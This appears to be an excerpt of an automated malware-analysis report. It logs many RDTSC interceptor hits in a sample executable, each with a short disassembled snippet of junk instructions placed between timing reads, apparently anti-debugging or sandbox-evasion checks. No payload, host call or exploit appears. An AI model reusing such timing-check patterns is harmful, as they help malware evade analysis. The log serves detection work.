    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF8E55 second address: EF8E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF8E59 second address: EF8E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9177 second address: EF917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF975A second address: EF9760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9760 second address: EF9767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9767 second address: EF976C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF976C second address: EF9772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9772 second address: EF9794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jne 00007F0BACBDA3D6h 0x00000010 jmp 00007F0BACBDA3DEh 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9794 second address: EF97AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0BACBDA19Fh 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF97AA second address: EF97B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF97B2 second address: EF97C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF97C7 second address: EF97CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9AEF second address: EF9AF5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9AF5 second address: EF9B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E2h 0x00000007 jmp 00007F0BACBDA3E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0BACBDA3DDh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF9E0C second address: EF9E30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A6h 0x0000000d je 00007F0BACBDA196h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE163 second address: EFE167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE167 second address: EFE16B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE16B second address: EFE171 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE171 second address: EFE17B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE17B second address: EFE19C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E7h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFE19C second address: EFE1A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F03619 second address: F0363F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E2h 0x00000007 jmp 00007F0BACBDA3DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0363F second address: F0365F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0365F second address: F03665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F09391 second address: F09397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0951C second address: F09521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0995A second address: F09975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F09975 second address: F09979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F09979 second address: F09995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0BACBDA1A4h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F09AD0 second address: F09AD6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A0FD second address: F0A11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0BACBDA1A4h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A11A second address: F0A124 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A124 second address: F0A153 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0BACBDA19Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0BACBDA1A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A153 second address: F0A16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DAh 0x00000009 popad 0x0000000a jbe 00007F0BACBDA3F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A16A second address: F0A185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A185 second address: F0A18A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0A18A second address: F0A198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0AF0E second address: F0AF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0BACBDA3D6h 0x0000000d jmp 00007F0BACBDA3DFh 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0AF2A second address: F0AF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F0AF2E second address: F0AF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F08F5D second address: F08F63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F12614 second address: F12618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F12618 second address: F1261C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F1261C second address: F12624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F12922 second address: F12928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F223B2 second address: F223BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BACBDA3DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F2256A second address: F22590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0BACBDA1A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F22590 second address: F225A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jno 00007F0BACBDA3D6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F2457E second address: F24589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F24589 second address: F24596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F0BACBDA3D6h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F246F6 second address: F24700 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F2AA3C second address: F2AA54 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0BACBDA3D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jo 00007F0BACBDA3D6h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F2CCC1 second address: F2CCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0BACBDA196h 0x0000000a jnl 00007F0BACBDA19Eh 0x00000010 je 00007F0BACBDA1C5h 0x00000016 jc 00007F0BACBDA19Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F2CCE7 second address: F2CD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F0BACBDA3E7h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F367D7 second address: F367DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: F367DD second address: F367FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0BACBDA3DEh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jg 00007F0BACBDA3D6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F367FD second address: F36801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36801 second address: F36807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36807 second address: F36811 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA1A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F36639 second address: F3663F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3663F second address: F3665C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jmp 00007F0BACBDA1A5h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D71D second address: F3D731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D88A second address: F3D8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA1A1h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA19Dh 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3D9F2 second address: F3DA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DCh 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jns 00007F0BACBDA3DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F0BACBDA3D6h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DA1B second address: F3DA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DA1F second address: F3DA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jns 00007F0BACBDA3D6h 0x00000010 ja 00007F0BACBDA3D6h 0x00000016 jmp 00007F0BACBDA3E8h 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DE81 second address: F3DEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0BACBDA1A9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEA0 second address: F3DEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jns 00007F0BACBDA3D6h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEAC second address: F3DEB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEB0 second address: F3DEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BACBDA3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0BACBDA3D6h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3DEC7 second address: F3DECB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F3E8E1 second address: F3E8F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DDh 0x00000009 pop ecx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CE3 second address: F42CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CE9 second address: F42CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CEF second address: F42CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F42CF3 second address: F42D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BACBDA3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44C1C second address: F44C4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F0BACBDA19Bh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0BACBDA196h 0x00000019 jmp 00007F0BACBDA1A2h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44C4D second address: F44C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F44959 second address: F4497C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a popad 0x0000000b jmp 00007F0BACBDA1A8h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4803F second address: F48055 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jc 00007F0BACBDA3F7h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A6BB second address: F4A6F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0BACBDA19Bh 0x0000000d jmp 00007F0BACBDA1A9h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0BACBDA19Fh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A6F8 second address: F4A707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A707 second address: F4A711 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F4A711 second address: F4A716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D42 second address: F57D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D46 second address: F57D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0BACBDA3D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D51 second address: F57D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0BACBDA196h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jno 00007F0BACBDA1A7h 0x00000014 jmp 00007F0BACBDA19Fh 0x00000019 pushad 0x0000001a jmp 00007F0BACBDA19Bh 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F57D95 second address: F57D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F64BFC second address: F64C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 jng 00007F0BACBDA1A2h 0x0000000d pop edi 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jo 00007F0BACBDA196h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79E3E second address: F79E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F79E42 second address: F79E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA19Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: F7917E second address: F79192 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BACBDA3D6h 0x00000008 jmp 00007F0BACBDA3DAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
